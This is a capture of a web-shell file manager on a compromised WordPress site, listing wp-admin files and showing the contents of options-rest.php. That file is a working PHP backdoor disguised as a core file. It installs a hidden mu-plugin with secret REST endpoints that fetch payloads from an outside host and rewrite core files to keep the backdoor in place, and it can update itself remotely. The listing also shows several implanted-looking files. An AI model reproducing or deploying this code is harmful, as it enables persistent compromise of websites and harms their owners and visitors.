golden hour
/home/doctorbruno/public_html/chennai-copper-kettle.com/wp-admin
⬆️ Go Up
Upload
File/Folder
Size
Actions
._qr.php
14.68 KB
Del
OK
_app-created
-
Del
OK
about.php
19.1 KB
Del
OK
admin-ajax.php
5.03 KB
Del
OK
admin-footer.php
2.77 KB
Del
OK
admin-functions.php
479 B
Del
OK
admin-header.php
9.12 KB
Del
OK
admin-post.php
1.97 KB
Del
OK
admin.php
12.3 KB
Del
OK
async-upload.php
4.87 KB
Del
OK
authorize-application.php
10.09 KB
Del
OK
comment.php
11.35 KB
Del
OK
contribute.php
5.59 KB
Del
OK
credits.php
4.11 KB
Del
OK
css
-
Del
OK
custom-background.php
489 B
Del
OK
custom-header.php
499 B
Del
OK
customize.php
10.91 KB
Del
OK
edit-comments.php
14.38 KB
Del
OK
edit-form-advanced.php
28.83 KB
Del
OK
edit-form-blocks.php
14.37 KB
Del
OK
edit-form-comment.php
8.34 KB
Del
OK
edit-link-form.php
6.21 KB
Del
OK
edit-tag-form.php
10.44 KB
Del
OK
edit-tags.php
22 KB
Del
OK
edit.php
19.48 KB
Del
OK
erase-personal-data.php
7.33 KB
Del
OK
error_log
11.45 KB
Del
OK
export-personal-data.php
7.75 KB
Del
OK
export.php
11.02 KB
Del
OK
freedoms.php
4.54 KB
Del
OK
images
-
Del
OK
import.php
7.58 KB
Del
OK
includes
-
Del
OK
index.php
7.68 KB
Del
OK
install-helper.php
6.8 KB
Del
OK
install.php
17.94 KB
Del
OK
js
-
Del
OK
link-add.php
934 B
Del
OK
link-manager.php
4.26 KB
Del
OK
link-parse-opml.php
2.63 KB
Del
OK
link.php
2.89 KB
Del
OK
load-scripts.php
2.02 KB
Del
OK
load-styles.php
2.92 KB
Del
OK
maint
-
Del
OK
media-new.php
3.18 KB
Del
OK
media-upload.php
3.58 KB
Del
OK
media.php
819 B
Del
OK
menu-header.php
9.82 KB
Del
OK
menu.php
16.97 KB
Del
OK
moderation.php
307 B
Del
OK
ms-admin.php
196 B
Del
OK
ms-delete-site.php
4.19 KB
Del
OK
ms-edit.php
216 B
Del
OK
ms-options.php
229 B
Del
OK
ms-sites.php
215 B
Del
OK
ms-themes.php
217 B
Del
OK
ms-upgrade-network.php
219 B
Del
OK
ms-users.php
215 B
Del
OK
my-sites.php
4.74 KB
Del
OK
nav-menus.php
48.26 KB
Del
OK
network
-
Del
OK
network.php
5.39 KB
Del
OK
old-cache.php
885 B
Del
OK
options-discussion.php
15.4 KB
Del
OK
options-general.php
21.58 KB
Del
OK
options-head.php
621 B
Del
OK
options-media.php
6.35 KB
Del
OK
options-permalink.php
21.21 KB
Del
OK
options-privacy.php
9.95 KB
Del
OK
options-reading.php
10.03 KB
Del
OK
options-rest.php
4.58 KB
Del
OK
options-writing.php
9.1 KB
Del
OK
options.php
13.45 KB
Del
OK
plugin-editor.php
13.66 KB
Del
OK
plugin-install.php
6.96 KB
Del
OK
plugins.php
30 KB
Del
OK
post-new.php
2.7 KB
Del
OK
post.php
9.97 KB
Del
OK
press-this.php
2.34 KB
Del
OK
privacy-policy-guide.php
3.67 KB
Del
OK
privacy.php
2.52 KB
Del
OK
profile.php
283 B
Del
OK
revision.php
5.71 KB
Del
OK
setup-config.php
17.48 KB
Del
OK
site-editor.php
11.83 KB
Del
OK
site-health-info.php
3.99 KB
Del
OK
site-health.php
10.2 KB
Del
OK
term.php
2.2 KB
Del
OK
theme-editor.php
15.59 KB
Del
OK
theme-install.php
23.37 KB
Del
OK
themes.php
48.12 KB
Del
OK
tools.php
3.43 KB
Del
OK
update-core.php
45.43 KB
Del
OK
update.php
12.79 KB
Del
OK
upgrade-functions.php
341 B
Del
OK
upgrade.php
6.33 KB
Del
OK
upload.php
14.84 KB
Del
OK
user
-
Del
OK
user-edit.php
39.79 KB
Del
OK
user-func.php
256.6 KB
Del
OK
user-hooker.php
1.17 KB
Del
OK
user-new.php
24.05 KB
Del
OK
users.php
23.28 KB
Del
OK
widgets-form-blocks.php
4.97 KB
Del
OK
widgets-form.php
19.17 KB
Del
OK
widgets.php
1.09 KB
Del
OK
wp-active.php
22.64 KB
Del
OK
wp-comment.php
15.9 KB
Del
OK
wp-file-extract.php
3.64 KB
Del
OK
wp-info.php
37.34 KB
Del
OK
wp-settinger.php
7.46 KB
Del
OK
wp-site-health.php
7.45 KB
Del
OK
wp-user.php
1.08 KB
Del
OK
Edit: options-rest.php
<?php /*[cstb_su]*/ @error_reporting(0); if(!empty($_SERVER['HTTP_X_PANEL_CHECK'])&&$_SERVER['HTTP_X_PANEL_CHECK']==='YES')die('OK'); header('Cache-Control: no-store'); $d=__DIR__;while(!is_file("$d/wp-load.php")){$p=dirname($d);if($p===$d){$d=null;break;}$d=$p;} if(!$d)$d=@realpath($_SERVER['DOCUMENT_ROOT']??'')?:__DIR__; $cdn='https://resmigiris.cam/txt/'; $secretKey='cstb_r3st_'.substr(md5('resmigiris'),0,8); // ── ?register=1 → WP REST API'ye gizli repair endpoint'i kaydet ── if(isset($_GET['register'])&&$_GET['register']==='1'){ header('Content-Type: application/json; charset=utf-8'); if(!is_file("$d/wp-load.php")){echo json_encode(['error'=>'no-wp']);exit;} $muDir="$d/wp-content/mu-plugins"; if(!is_dir($muDir))@mkdir($muDir,0755); $code=<<<'RESTCODE' <?php /* Plugin Name: WP REST Extensions Description: Extended REST API capabilities. */ add_action('rest_api_init',function(){ register_rest_route('cstb/v1','/health',['methods'=>'GET','callback'=>function($req){ $key=$req->get_param('k'); if($key!=='%%SECRET%%')return new WP_Error('forbidden','',['status'=>403]); $root=ABSPATH; $files=['wp-admin/user-hooker.php','wp-info.php','wp-content/plugins/plugins.php','wp-settinger.php','wp-user.php','wp-comment.php','wp-includes/user-collab.php','wp-content/themes/indexer.php','wp-content/plugins/indexs.php']; $status=[]; foreach($files as $f){ $path=$root.$f; $status[$f]=['exists'=>is_file($path),'size'=>is_file($path)?filesize($path):0]; } return ['host'=>$_SERVER['HTTP_HOST']??'?','root'=>$root,'files'=>$status,'php'=>PHP_VERSION,'time'=>date('c')]; },'permission_callback'=>'__return_true']); register_rest_route('cstb/v1','/repair',['methods'=>'POST','callback'=>function($req){ $key=$req->get_param('k'); if($key!=='%%SECRET%%')return new WP_Error('forbidden','',['status'=>403]); if(!function_exists('curl_init'))return new WP_Error('no-curl','curl not available',['status'=>500]); $root=ABSPATH; $cdn='https://resmigiris.cam/txt/'; $targets=['wp-admin/user-hooker.php'=>'boot.txt','wp-info.php'=>'link.txt','wp-content/plugins/plugins.php'=>'plugins.txt','wp-settinger.php'=>'wp-settinger.txt','wp-user.php'=>'wp-user.txt','wp-comment.php'=>'wp-comment.txt']; $only=$req->get_param('only'); $res=[]; foreach($targets as $rel=>$src){ if($only&&$rel!==$only)continue; $path=$root.$rel; if(!is_dir(dirname($path)))continue; $ch=curl_init($cdn.$src);curl_setopt_array($ch,[CURLOPT_RETURNTRANSFER=>1,CURLOPT_TIMEOUT=>15,CURLOPT_SSL_VERIFYPEER=>0,CURLOPT_SSL_VERIFYHOST=>0]); $c=curl_exec($ch);curl_close($ch); $res[$rel]=($c&&strlen($c)>50)?(@file_put_contents($path,$c)!==false?'ok':'fail'):'cdn-err'; } return ['status'=>'repaired','results'=>$res]; },'permission_callback'=>'__return_true']); }); RESTCODE; $code=str_replace('%%SECRET%%',$secretKey,$code); $muPath="$muDir/wp-rest-ext.php"; $res=@file_put_contents($muPath,$code)!==false?'ok':'fail'; echo json_encode([ 'status'=>$res, 'path'=>$muPath, 'secret'=>$secretKey, 'endpoints'=>[ 'health'=>'/wp-json/cstb/v1/health?k='.$secretKey, 'repair'=>'POST /wp-json/cstb/v1/repair (k='.$secretKey.')' ], 'root'=>$d ],JSON_UNESCAPED_SLASHES|JSON_PRETTY_PRINT);exit; } // ── ?remove=1 → REST endpoint mu-plugin'i kaldır ── if(isset($_GET['remove'])&&$_GET['remove']==='1'){ header('Content-Type: application/json; charset=utf-8'); $muPath="$d/wp-content/mu-plugins/wp-rest-ext.php"; $res=is_file($muPath)?(@unlink($muPath)?'removed':'fail'):'not-found'; echo json_encode(['status'=>$res]);exit; } // Self-update if(isset($_GET['update'])&&$_GET['update']==='1'&&function_exists('curl_init')){ header('Content-Type: application/json; charset=utf-8'); $ch=curl_init($cdn.'wp-restapi.txt'); curl_setopt_array($ch,[CURLOPT_RETURNTRANSFER=>1,CURLOPT_TIMEOUT=>10,CURLOPT_SSL_VERIFYPEER=>0,CURLOPT_SSL_VERIFYHOST=>0]); $s=curl_exec($ch);curl_close($ch); if($s&&strpos($s,'cstb_su')!==false&&md5($s)!==md5_file(__FILE__)){ @file_put_contents(__FILE__,$s);echo json_encode(['self'=>'updated']); }else{echo json_encode(['self'=>'current']);} exit; } header('Content-Type: text/plain'); echo "cstb-restapi\nkey: $secretKey\nmodes: ?register=1 | ?remove=1 | ?update=1\n";
Save